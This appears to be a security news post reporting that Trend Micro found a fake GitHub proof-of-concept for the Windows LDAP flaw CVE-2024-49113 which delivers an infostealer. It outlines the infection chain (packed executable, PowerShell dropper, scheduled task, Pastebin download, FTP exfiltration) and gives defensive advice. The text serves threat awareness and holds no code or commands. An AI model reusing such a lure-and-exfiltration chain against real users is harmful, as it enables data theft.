Security researchers at Trend Micro have uncovered a malicious GitHub repository masquerading as a proof-of-concept (PoC) exploit for CVE-2024-49113, known as “LDAPNightmare.” The repository, which appears to be forked from SafeBreach Labs’ legitimate PoC, contains malware designed to steal sensitive information from unsuspecting users.

The exploit takes advantage of a Windows Lightweight Directory Access Protocol (LDAP) vulnerability that Microsoft patched in December 2024. Initial confusion surrounding the vulnerability’s designation (CVE-2024-49113 vs. CVE-2024-49112) created heightened interest that attackers sought to exploit.

Technical Analysis:
– The malicious repository distributes a UPX-packed executable (poc.exe)
– Upon execution, it deploys a PowerShell script in the %Temp% folder
– Creates a scheduled task that runs an encoded script
– Downloads additional payload from Pastebin
– Collects system information including:
– Computer details
– Running processes
– Directory listings
– IP and network adapter information
– Installed updates
– Exfiltrates data in ZIP format to an FTP server using hardcoded credentials

Security Recommendations:
– Only download PoC exploits from reputable security researchers and firms
– Verify repository authenticity
– Review code before execution
– Scan binaries with VirusTotal
– Avoid obfuscated code
– Exercise caution when downloading public exploits

This incident serves as a reminder that threat actors continue to leverage GitHub’s platform to distribute malware through seemingly legitimate security tools.